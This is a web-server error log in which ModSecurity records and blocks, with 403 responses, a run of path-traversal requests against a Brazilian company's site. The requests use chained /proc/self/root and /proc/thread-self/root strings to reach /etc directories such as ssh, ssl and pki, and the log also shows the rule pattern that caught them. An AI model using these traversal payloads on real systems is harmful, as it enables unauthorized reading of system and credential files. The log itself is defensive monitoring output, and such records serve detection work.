"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXfOoXxyEfFpUF8f9e3QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:16:01.733797 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:36284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXgeoXxyEfFpUF8f9e4QAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:16:40.031261 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:43204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXqEzinOy1jxa1j4cE2AAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:16:50.088137 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:40124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqXrwkwaGbbGflqUZABGwAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:23.891674 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:42880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX09Y0UrI5A3LftIyUaQAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:17:24.507845 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:50082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX1Pu8EFLIOrSqIpv15QAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:40.372078 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:46764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX5Mdf6f5d65gmYZTFagAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:41.660289 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:47818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX5eoXxyEfFpUF8f9fEAAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:42.954775 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:47822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX5uw_le52K8_3pV3QVwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:44.265605 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:47830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX6NY0UrI5A3LftIyUbgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:45.579197 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.243.128:47838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX6cdf6f5d65gmYZTFbAAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:47.003061 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:47854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX6-oXxyEfFpUF8f9fEgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:48.319200 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:47860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX7AkwaGbbGflqUZABQwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:49.802116 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:44524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX7eoXxyEfFpUF8f9fEwAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:52.119129 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:44526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX8Na6ubjKNq_cu4aJywAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:55.691678 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:44540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX89Y0UrI5A3LftIyUeAAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:58.371103 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:44546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX9sdf6f5d65gmYZTFewAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:17:59.740881 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:46158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX99a6ubjKNq_cu4aJ0QAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:02.347651 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:46166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX-ta6ubjKNq_cu4aJ0wAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:03.671893 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:46178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX-9Y0UrI5A3LftIyUfgAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:04.980240 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:46190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX_CmAPhZkrhU8w4leIAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:18:06.336574 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:46204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqX_kzinOy1jxa1j4cFLQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
